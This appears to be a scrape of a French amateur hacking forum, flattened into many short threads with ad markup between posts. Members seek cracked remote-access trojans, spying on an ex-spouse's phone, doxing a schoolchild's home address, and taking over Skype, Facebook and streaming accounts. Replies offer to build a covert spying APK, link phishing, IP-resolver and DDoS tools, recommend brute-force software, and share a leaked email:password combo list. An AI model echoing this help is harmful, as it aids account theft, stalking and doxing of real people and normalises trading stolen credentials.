Présentation de mon site DDOS<sep>ya mieux sur internet non ? show_eval12654NoteEvaluateLessMore; 
crack Luminosity link 1.5.1<sep>Bonjour a tous cétait pour savoir si quelqun aurait un bon crack sans virus de luminosity link 1.5.1 ou plus récents ? merci  show_eval15286NoteEvaluateLessMore; 
crack Luminosity link 1.5.1<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
crack Luminosity link 1.5.1<sep>Luminosity link   Mon RAT enfin avant ^^ ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval15288NoteEvaluateLessMore; 
crack Luminosity link 1.5.1<sep>Il me semble quil est chaud à crack :/ Mais surement possible ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval15289NoteEvaluateLessMore; 
Hacker portable sans software<sep>Bjr a tousJ ai 1 besoin urgent de connaître le contenu portable  SMS et appels de mon ex cause divorce...urgentJe nai aucun accès au portable cibleC est juste vital...Merci a vous ...vous allez me sauver la vie  show_eval17277NoteEvaluateLessMore; 
Hacker portable sans software<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Hacker portable sans software<sep>Jai une solutionMais malheureusement cest pas une solution très discret.. Mais tu pourras avoir accès au : SMS/CallLogs Journal dappel /Contacts et photos. Cela marche que si il a un téléphone Android.. Voilà comment je vois les choses : Je crée un virus qui est une application .apk si tu connais il faudra linstaller sur le téléphone. Et jaurais accès au téléphone  Je te donnerais tout les screenshots / un fichier texte des SMS et Contacts etc..Mais je pourrais essayer de le cacher dans une photo pour que ce soit plus discret. Cest tout ce que je peux te proposer ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval17279NoteEvaluateLessMore; 
HACK POKEMON GO FR IOS / JOYSTICKS TP<sep>  Aymeric Kornatowski wrote:  Merci pour la precision ^^ pas de problemme show_eval13553NoteEvaluateLessMore; 
HACK POKEMON GO FR IOS / JOYSTICKS TP<sep>Version Android svp show_eval14786NoteEvaluateLessMore; 
Renseignements<sep>Bonjour  Voilà suite à un vol de guilde sur un jeu en ligne je souhaiterais savoir comment faire pour la récupérer. Moi et mes compagnons sommes attachés à cette guilde et il ny a aucune justice légale pour le coup. Esce possible de trouver un mot de passe comme ça ou il faut absolument lemail? Jentends partout que pirater un compte mail nest pas simple.. Merci davance pour votre aide   show_eval16301NoteEvaluateLessMore; 
Renseignements<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Renseignements<sep>OH PUTAIN LE PAUVRE AIDEZ LE Il a perdu sa guilde sur wow show_eval16304NoteEvaluateLessMore; 
Renseignements<sep>Hahaha ce que tu es drôle  Je suis PLIÉE  Rien nest juste dans ta phrase ^^ show_eval16343NoteEvaluateLessMore; 
Renseignements<sep>Désolé madame  je le ferais plus  show_eval16344NoteEvaluateLessMore; 
Renseignements<sep>Nan en vrai si tu as besoin daide :p show_eval16345NoteEvaluateLessMore; 
Renseignements<sep>Oui je suis à la recherche d   lol mais si rien nest possible je dirais adieu à ma vengeance dun petit signe de la main SNIF  show_eval16377NoteEvaluateLessMore; 
Bot DarkOrbit<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Bot DarkOrbit<sep>sert a quoi ??? show_eval1532NoteEvaluateLessMore; 
Bot DarkOrbit<sep>enfaite ce truc sere just a clicker ses pas un bot darkorbit lol______________________________  Nous avons lage de lunivers : rien ne se perd  rien ne se crée  tout ce transforme  show_eval1548NoteEvaluateLessMore; 
Bot DarkOrbit<sep>  ArdsGames wrote:  enfaite ce truc sere just a clicker ses pas un bot darkorbit lol  Ouais mais mon père avez des potes qui botter et cétait cher juste pour un bot quand meme. show_eval1823NoteEvaluateLessMore; 
Bot DarkOrbit<sep>http://uberorbit.net/ site dun pote mieux que lofficiel. show_eval11572NoteEvaluateLessMore; 
RECRUTEMENTS : CONDITIONS<sep>IL VOUS FAUT :     Etre passionné et maîtriser lart du Hacking je parles en langage de codage thermes employés par les hackers ... au moins un petit peu. Etre un minimum mature et avoir une disponibilité importante dans la semaine Connaitre les règles du chat/forum  Poster des sujets cohérents et intéressants pour la communauté à un rythme régulier Tutos ... Avoir une langue française PRESQUE PARFAITE exemple :hille nE Pho paT ekrir keaum sa Mais il faut écrire comme ça Je crois que jai a peu près fais le tour pour les conditions...sur ce Bonne continuation et vive le hack           show_eval1155NoteEvaluateLessMore; 
RECRUTEMENTS : CONDITIONS<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
[RESOLUS] Besoin d'aide #DOX<sep>Bonjour/BonsoirJe voudrais vous demander si cela était possible de récuperée un numéro de tél et son adresse exacte dont le nom de cest parentjai déja son nom  prénom  ville  code postal  college  Opérateur   Age  skype réseaux sociaux  ip______________________________  Bientot nouveau Forum :OLast edited by SayniHack on Wed 5 Jul  15:51 2017; edited 1 time in total show_eval15689NoteEvaluateLessMore; 
[RESOLUS] Besoin d'aide #DOX<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
[RESOLUS] Besoin d'aide #DOX<sep>Tu connais lannuaire téléphonique? show_eval15692NoteEvaluateLessMore; 
[RESOLUS] Besoin d'aide #DOX<sep>Oui xD______________________________  Bientot nouveau Forum :O show_eval15695NoteEvaluateLessMore; 
[RESOLUS] Besoin d'aide #DOX<sep>Ha merci  maintenant jai le prénom de son pere est son adresse exacte ______________________________  Bientot nouveau Forum :O show_eval15696NoteEvaluateLessMore; 
[RESOLUS] Besoin d'aide #DOX<sep>  SayniHack wrote:  Ha merci  maintenant jai le prénom de son pere est son adresse exacte    Tu es aller dans quel annuaire ?______________________________  printfVerrou par verrou et lun après lautre cest la clé du bon hacker. On ne peut pas ouvrir la porte numéro 9 avant davoir débloqué la numéro 8.; show_eval15743NoteEvaluateLessMore; 
VMware Workstation Pro 12 + Clé d'activation<sep>   Eater wrote:  un GRAND merci jai passer la clé a mon pote et sa a marché du coup super sympa ^^  show_eval15089NoteEvaluateLessMore; 
VMware Workstation Pro 12 + Clé d'activation<sep>Supermerci a toi ______________________________  you knowed since the start b u t y o u w a n t e d t o f o r g e t. show_eval17588NoteEvaluateLessMore; 
Comment hacker un compte Skype<sep>Bonjour jaimerais savoir comment hacker un compte Skype avec différentes méthodes mais pas trop compliqué et aussi mexpliquer ces méthodes .Jaimerais aussi que lon mexplique la méthode de brute forcer ______________________________  Simple mais très utile :p show_eval11299NoteEvaluateLessMore; 
Comment hacker un compte Skype<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Comment hacker un compte Skype<sep>  JyTou wrote:  Bonjour jaimerais savoir comment hacker un compte Skype avec différentes méthodes mais pas trop compliqué et aussi mexpliquer ces méthodes .Jaimerais aussi que lon mexplique la méthode de brute forcer  alors :phiching  http://zshadow.co/home OopsCrasher  http://www.2shared.com/file/RfRAHA4N/OppsCrasher.html Skype resolver  http://mostwantedhf.info/  show_eval11301NoteEvaluateLessMore; 
Comment hacker un compte Skype<sep>On peut faire comment pour hacker un compte en faisant un ddos ou un resolver______________________________  Simple mais très utile :p show_eval11315NoteEvaluateLessMore; 
Comment hacker un compte Skype<sep>  JyTou wrote:  On peut faire comment pour hacker un compte en faisant un ddos ou un resolver trouve lip avec le resolver prend oops crasher et rentre lip show_eval11317NoteEvaluateLessMore; 
Comment hacker un compte Skype<sep>Oui mais da cest pour ddos pas pour obtenir le mot de passe______________________________  Simple mais très utile :p show_eval11319NoteEvaluateLessMore; 
Comment hacker un compte Skype<sep>quelle relation a tu avec la personne que tu vise ? ^^ show_eval11338NoteEvaluateLessMore; 
Comment Spoof un E-mail sur Kali<sep>c normale que me suit fait bannir de smtp2go show_eval16821NoteEvaluateLessMore; 
Comment Spoof un E-mail sur Kali<sep>  sagendal wrote:  c normale que me suit fait bannir de smtp2go Ca dépend de lemail que tu as essayer de spoof ^^______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16822NoteEvaluateLessMore; 
Site WTF<sep>Bien le bonjour aujourdhui je vais vous présenter un site WTF Qui vous permettra de mettre une image de fond et une autre image par dessus sur fond de music Vous navez pas compris tenez vous comprendrez plus facilementhttp://corgiorgy.com/Et pour ceux qui ont envie de cree a peut pres la meme chose tenez http://my.corgiorgy.com/poster en commentaire vos creation sur ceux SALUUUT show_eval1852NoteEvaluateLessMore; 
Site WTF<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Site WTF<sep>VOILA CE QUON PEUT FAIRE xD : http://macreationwtffff.corgiorgy.com/ show_eval1853NoteEvaluateLessMore; 
Site WTF<sep>LOOOOOOOOOOOOL effectivement cest WTF  show_eval1857NoteEvaluateLessMore; 
Site WTF<sep>http://caleconman1.corgiorgy.com/ :p  show_eval1866NoteEvaluateLessMore; 
Site WTF<sep>http://funfuckingparty.corgiorgy.com/Et un de plus xD show_eval1881NoteEvaluateLessMore; 
[RESOLUS] Probleme Phishing<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Compte Twitter<sep>  minirisoto wrote:  jai du mal à cerner lutilité mais.... merci ^^ Ben a nous montrer quil sait BruteForce x______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval15509NoteEvaluateLessMore; 
bypass MDP interface admin BBOX<sep>Salut à tous Aujourdhui je vais faire un tuto qui ne servira à rien pour les 3/4 des gens... mais bon.Pour réussir à ce connecter à linterface admin de votre box BBOX cest très simple.1  Mettez vous sur la page de connexion à linterface.2  appuyez sur Mot De Passe Oublié3  Après avoir fais ça allez jusquà votre box et appuyez sur le bouton central pendant 5 sec4  Normalement une page pour changer ce mot de passe fermé la page et relancé là.5  Et PAF vous voilà sur le panel adminVoilà voilà show_eval15139NoteEvaluateLessMore; 
bypass MDP interface admin BBOX<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Cacher un dossier + mdp<sep>Je vais vous aidez a cacher vos Dossier pour les noobsPour commencez créée un fichier .baten code vous écrivez ceci Spoiler@ECHO OFF title Folder Private if EXIST Control Panel.{21EC20203AEA1069A2DD08002B30309D} goto UNLOCK if NOT EXIST Private goto MDLOCKER :CONFIRM echo voulez vous verrouiller le dossier private Y/N set/p cho=> if cho==Y goto LOCK if cho==y goto LOCK if cho==n goto END if cho==N goto END echo mauvais choix tapez Y pour oui et N pour non. goto CONFIRM :LOCK ren Private Control Panel.{21EC20203AEA1069A2DD08002B30309D} attrib h s Control Panel.{21EC20203AEA1069A2DD08002B30309D} echo dossier verrouillé goto End :UNLOCK echo Entrez le mot de passe pour accèder au dossier verrouillé set/p pass=> if NOT pass== PassWord goto FAIL attrib h s Control Panel.{21EC20203AEA1069A2DD08002B30309D} ren Control Panel.{21EC20203AEA1069A2DD08002B30309D} Private echo dossier déverrouillé goto End :FAIL echo mot de passe invalide goto end :MDLOCKER md Private echo dossier Private créé goto End :End
Cacher un dossier + mdp<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Cacher un dossier + mdp<sep>Déjà rien que le .bat je sais pas pourquoi mais cest pas très crédible ^^  LeagueContreLe.Bat TousContreLe.Bat Le.BatPourTous x______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16151NoteEvaluateLessMore; 
Cacher un dossier + mdp<sep>  Traja06 wrote:  Déjà rien que le .bat je sais pas pourquoi mais cest pas très crédible ^^  LeagueContreLe.Bat TousContreLe.Bat Le.BatPourTous x XDD show_eval16153NoteEvaluateLessMore; 
Cacher un dossier + mdp<sep>  Traja06 wrote:  Déjà rien que le .bat je sais pas pourquoi mais cest pas très crédible ^^  LeagueContreLe.Bat TousContreLe.Bat Le.BatPourTous x pffff x______________________________  Jai changé de pseudo mais jai la flemme de me refaire un compte cest OYama pour ceux qui veulent savoir show_eval16210NoteEvaluateLessMore; 
Cacher un dossier + mdp<sep>Mouai.. Ca passe pour cette fois x______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16248NoteEvaluateLessMore; 
Cacher un dossier + mdp<sep>  Traja06 wrote:  Mouai.. Ca passe pour cette fois x Merci mdr  show_eval16253NoteEvaluateLessMore; 
My canal se connecter<sep> Bonsoir à tous je recherche des codes pour me connecter à mycanal intégral. Je connais pas bien le site nhésitez pas à me dire si je dois formuler ma demande ailleurs show_eval17406NoteEvaluateLessMore; 
My canal se connecter<sep>Jai besoin dunMail  mot de passe my canal integral. show_eval17410NoteEvaluateLessMore; 
My canal se connecter<sep>pv show_eval17411NoteEvaluateLessMore; 
My canal se connecter<sep>Personne ne peut maider je voudrai avoir accés à Mycanal integral et canalplay. show_eval17445NoteEvaluateLessMore; 
My canal se connecter<sep>gratuitement tu naura pas meme sur dautre forum ou aussi non il faut te former show_eval17447NoteEvaluateLessMore; 
My canal se connecter<sep>Lorsque jétais abonné je faisais profiter de mes identifiants gratuitement.  Laisse moi un mois gratis. show_eval17457NoteEvaluateLessMore; 
Comment assigné une adresse ip a quelqun ?<sep>Bonjour jai une ip logger pour choper des ip logique et jen est chopé une et on peut cliuer sur mon lien que a partir de skype donc ducous jaimerais bien savoir comment faire pour connaitre le quel de mes contact a cette ip voila jespère être asser clair  show_eval12348NoteEvaluateLessMore; 
Comment assigné une adresse ip a quelqun ?<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Comment assigné une adresse ip a quelqun ?<sep>Tu envoit un lien par personne show_eval12363NoteEvaluateLessMore; 
H3ll0 W0RlD =)<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
H3ll0 W0RlD =)<sep>MAUVAISE SECTION  JE MOOVE TON SUJET > Demande daide  show_eval16046NoteEvaluateLessMore; 
H3ll0 W0RlD =)<sep>  SuperBenoit wrote:  Bonjour à tousEtant depuis de nombreuses années un passionné de hacking et en ayant fais mon métier je me suis arrêté ici et jai trouvé le forum sympa. Je suis à la recherche de personne travaillant sur du cryptolocker si quelquun connait cela serait le top  Cest de la Cryptologie ? ^^______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16053NoteEvaluateLessMore; 
H3ll0 W0RlD =)<sep>Mince maintenant que tu le dis  Je vois le rapport ^^______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16056NoteEvaluateLessMore; 
Demande de hack Dirty Bomb<sep>Bonjour  jaimerai savoir si cest possible davoir un hack pour dirty bomb ? Du genre aimbot  godmod  on vois les ennemie a travers les murs etc .. ?Merci de votre réponseCordialement Teazix. show_eval12994NoteEvaluateLessMore; 
Demande de hack Dirty Bomb<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Combo List<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Combo List<sep> show_eval14117NoteEvaluateLessMore; 
Combo List<sep>Merci ça peut toujours servir avoir si elle est de bonne qualité et récente   show_eval14118NoteEvaluateLessMore; 
Combo List<sep>Il y a des Email:pass ancien que javai et des nouveaux que jai été chercher   show_eval14120NoteEvaluateLessMore; 
Combo List<sep> show_eval14121NoteEvaluateLessMore; 
Combo List<sep> show_eval14122NoteEvaluateLessMore; 
Combo List<sep>merci show_eval14123NoteEvaluateLessMore; 
Combo List<sep>merci show_eval14130NoteEvaluateLessMore; 
Combo List<sep>Je vais test______________________________  Wesh la streer show_eval14132NoteEvaluateLessMore; 
Combo List<sep>Faut les checks sur dautres sites______________________________   show_eval14139NoteEvaluateLessMore; 
Combo List<sep>DDD______________________________  Wesh la streer show_eval14152NoteEvaluateLessMore; 
Combo List<sep>Merci______________________________  Bye show_eval14211NoteEvaluateLessMore; 
Combo List<sep>cimer______________________________  Le Hack na pas de limite. show_eval14213NoteEvaluateLessMore; 
Combo List<sep>merci______________________________  dont worry i gotchu show_eval14251NoteEvaluateLessMore; 
Combo List<sep>Lol show_eval14307NoteEvaluateLessMore; 
Combo List<sep>lol show_eval14433NoteEvaluateLessMore; 
Combo List<sep>  Wizix Le Gameur wrote:  Nombre de  Email:Pass : 43 981{{{URL Combo List}}}     Merci bien______________________________  An bèz dé groce mer  show_eval14439NoteEvaluateLessMore; 
Combo List<sep>Merci  show_eval14631NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>tu en a pour  100 show_eval11605NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>Ouai mais ducoups cest pas pratique  pour lécran :/______________________________  Simple mais très utile :p show_eval11608NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>budget ?______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval11626NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>Genre 500 e______________________________  Simple mais très utile :p show_eval11627NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>Raspberry PI 2 B : 45 que tu relie a ta télé gratuitement  show_eval11631NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>Salut Tivyous alors :1. Jaime beaucoup ta PP ^^2. Et jaimerais savoir si tes vidéos ne seront que sur le rasberry PI ou si tu comptes tout de même refaire des vidéos où tu apprends le code ?Merci de me répondre  ______________________________  We are Anonymous we are Legion. We do not forgive we do not forget. Expect us ^^ show_eval11634NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>Possible de le faire mais avec un écran ?______________________________  Simple mais très utile :p show_eval11641NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>  JyTou wrote:  Possible de le faire mais avec un écran ? Avec 500  tu peut avoir un bon PC : https://www.youtube.com/watch?v=pJAqyevgEuw______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval11642NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>500 e tu prend i5 4g de ram et carte graphique si besoin  quoi que les chipset de li5 sont assez puissants pour jouer moyennement a 23 jeux show_eval11648NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>  Speech Dumper wrote:  500 e tu prend i5 4g de ram et carte graphique si besoin  quoi que les chipset de li5 sont assez puissants pour jouer moyennement a 23 jeux Oui mais moi je veux un pc portable et pas pour les jeux______________________________  Simple mais très utile :p show_eval11652NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>oui doc cest bien ce qu jai dis un pc avec un i5 et 4voir 8go de ram te suffiront cherche un pc dans ces caraceteristiques show_eval11654NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>Essaie malgré tout de partir sur de la nouvelle architecture 1151 et DDR4 pour les novices le 1151 est le nouveau chipset sur les processeurs et la ddr4 cest la nouvelle gamme de RAMPas besoin de carte graphique dédié et Speech ta dirigé dans la bonne voix un I5 suffit largement et 4G de ram aussi.Si tu trouve pas le pc portable 1151 et DDR4 pour les RAM tourne toi alors vers lancienne génération1150 et DDR3 Sa marche aussi bien.CordialementEater show_eval11663NoteEvaluateLessMore; 
Avoir le code Wifi<sep>Salut je fait ce quil y a écrit enfin je ne sait pas si je lai bien fait : jai ouvert linviter de commande en administrateur jai taper = netsh wlan show profiles <....> key=clear  jai validé et puis il y a écrit Le fichier spécifié est introuvable . ^^ show_eval11280NoteEvaluateLessMore; 
Avoir le code Wifi<sep>  Shanks38 wrote:  Salut je fait ce quil y a écrit enfin je ne sait pas si je lai bien fait : jai ouvert linviter de commande en administrateur jai taper = netsh wlan show profiles <....> key=clear  jai validé et puis il y a écrit Le fichier spécifié est introuvable . ^^ met pas les <> et ça doit marcher mais pas pour moi  http://prntscr.com/b2d2qn  show_eval11284NoteEvaluateLessMore; 
Avoir le code Wifi<sep>Bonjour CocoDu69100 : Va dans les services de windows  ouvre le  va judqua service de configuration Wlansvc  si il est en manuel ou arrêter tu le démmare cela devrait fonctionnersinon chez moi ca fonctionne mais a la place du mdp il me marque  présent  ????quelquun à une idée ? show_eval14513NoteEvaluateLessMore; 
aidez moi svp je cherche un hack pour un jeu ^^<sep>Salut a tous  alors je mexplique il y a un jeu qui sappelle LC GENERIC NAME  02 cest un MMORPG plutôt cool et je cherche un hack du genre GOLD  vitesse augmenté etc...alors soit si quelquun peut maider a créer un logiciel permettant de faire de tel chose soit si quelquun connait un HACK pour ce jeu je lui en serait vraiment reconnaissant =      show_eval11282NoteEvaluateLessMore; 
aidez moi svp je cherche un hack pour un jeu ^^<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
aidez moi svp je cherche un hack pour un jeu ^^<sep>  Shanks38 wrote:  Salut a tous  alors je mexplique il y a un jeu qui sappelle LC GENERIC NAME  02 cest un MMORPG plutôt cool et je cherche un hack du genre GOLD  vitesse augmenté etc...alors soit si quelquun peut maider a créer un logiciel permettant de faire de tel chose soit si quelquun connait un HACK pour ce jeu je lui en serait vraiment reconnaissant =       cheat engine 6.4  le 6.5 a un virus show_eval11283NoteEvaluateLessMore; 
aidez moi svp je cherche un hack pour un jeu ^^<sep>merde jai 6.5 cest quoi le virus ? show_eval11288NoteEvaluateLessMore; 
aidez moi svp je cherche un hack pour un jeu ^^<sep>  Shanks38 wrote:  merde jai 6.5 cest quoi le virus ? moi mon anti virus me dis le virus comme dans hello world show_eval11305NoteEvaluateLessMore; 
Hack Youtube<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Hack Youtube<sep>petite histoire vrai :il y a quelque temps lors des premières versions de Youtube un hacker a réussi a pirater TOUTE les chaines dans leur intégralité... il a tout simplement trouvé une faille dans le système qui permettait de se connecter a n importe quel compte avec le meme mot de passe  quelques heures après youtube fut fermé et le bug corrigé  show_eval1679NoteEvaluateLessMore; 
Hack Youtube<sep>je voudrait savoir comment il fait le hacker spaso qui a hacker plusieur grand youtubeur ______________________________  bye hacker france show_eval1714NoteEvaluateLessMore; 
UdpCrasher<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
UdpCrasher<sep>Cé pour fair du Ddos ? ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval17491NoteEvaluateLessMore; 
UdpCrasher<sep>Houaa té tro for  Té tro un Anymouss  ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval17492NoteEvaluateLessMore; 
UdpCrasher<sep>jpp ca existe encore bot net maintenant show_eval17494NoteEvaluateLessMore; 
UdpCrasher<sep>le DdOs cé pour lé ha4xor______________________________  Copyright c dontssmeEZ La S3CURIT3R Mon site de générateur de compte:http://lickandleak.alwaysdata.net/ show_eval17496NoteEvaluateLessMore; 
UdpCrasher<sep>tk je connais mais jutilise pas show_eval17508NoteEvaluateLessMore; 
UdpCrasher<sep>je vé ddos mé ennemis avek car je suis un anoymous. jeu sui le best h4ker______________________________  Oui il te faut de bonnes directives pour faire la guerre et la victoire tient au grand nombre de conseillers.MossadH_Siphox show_eval17722NoteEvaluateLessMore; 
Minecraft pe pc<sep>salut tous es dis dans le titre merci de vos réponse ______________________________  Je suis Youtuber  Va tabonner  BigZey  show_eval13956NoteEvaluateLessMore; 
Minecraft pe pc<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Minecraft pe pc<sep>tu veux minecraft PE sur pc ? show_eval13957NoteEvaluateLessMore; 
Facebook - Bruteforce<sep>Alors voila je sais pas du tout comment my prendre et jen ai réellement besoin  une personne marnaque et jai besoin de choper son FB  avec vous un bon brute force et tout ce quil faut avec ? show_eval13872NoteEvaluateLessMore; 
Facebook - Bruteforce<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Facebook - Bruteforce<sep>bas tu peux utiliser le script en python que Raspi à mis dans ressource [Hack/NoHack] si tu as kali linux  tu peux utiliser hydra/hydraGTK et si tu es sur win tu peux les telecharger sur internet et sinon tu peux éventuellement utiliser Sentry Mba show_eval13874NoteEvaluateLessMore; 
Facebook - Bruteforce<sep>mais celui de raspi il est cool mais genre il à pas de proxy :/______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval13875NoteEvaluateLessMore; 
Facebook - Bruteforce<sep>une fois sur sentry Mba je fais quoi ? show_eval13877NoteEvaluateLessMore; 
Débanissement de gros serveur TeamSpeak<sep>Bonjour  Bonsoir  ou Bonne nuit  ou Bonne journé Ou bon Apétit Aujourdhui  comment se débannir de TeamSpeak Ceci est une version pour Les Gros serveur ex:Serveur CSGO  Funcraft ect...Car les petit serveur nont pas les même sécurités  beaucoup moin sécurisé MAIS  car il y as des exceptions on vas dire que ce tuto est universelle ok ?Il vous faudra ouvrir Regedit WINDOWSREnsuite  Suivre La zone etapes Par etapes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersionMaintenant  Vous trouverez une liste de valeur  Prenez : ProductID et changez nimporte quelle letre en chiffre et vice versa Vous pouvez également tout SUpprimer cela ne causera rien mais vous naurez plus besoin de faire cette manipulaiton Dans le TURFUPour vérifier si cela as correment fonctioné  Ouvrez Panneau de configuration\Tous les Panneaux de configuration\SystèmeDessendez et votre clé de produit as changé comme dans le Product IDVoila le plus chiant a faire est FINITCréez une Nouvelle identité Teamspeak Lancez un VPN  HotSpot Shield est le meilleur des gratuit selon moiRelancez teamspeak Connectez vous AVEC LA NOUVELLE IDENTITEEt voila vous etes débannis______________________________  Je déteste les vendeur de programme....JEN AI PAS BESOIN.... HEIN SPEECH DUMPERhttps://scan.majyx.net/scans/image/140df3820b0b4d5b199b5d0b512935f08f5abeb5 show_eval12452NoteEvaluateLessMore; 
Débanissement de gros serveur TeamSpeak<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Débanissement de gros serveur TeamSpeak<sep>Hotspot shield = ca marche mais bourre a la pub... show_eval12456NoteEvaluateLessMore; 
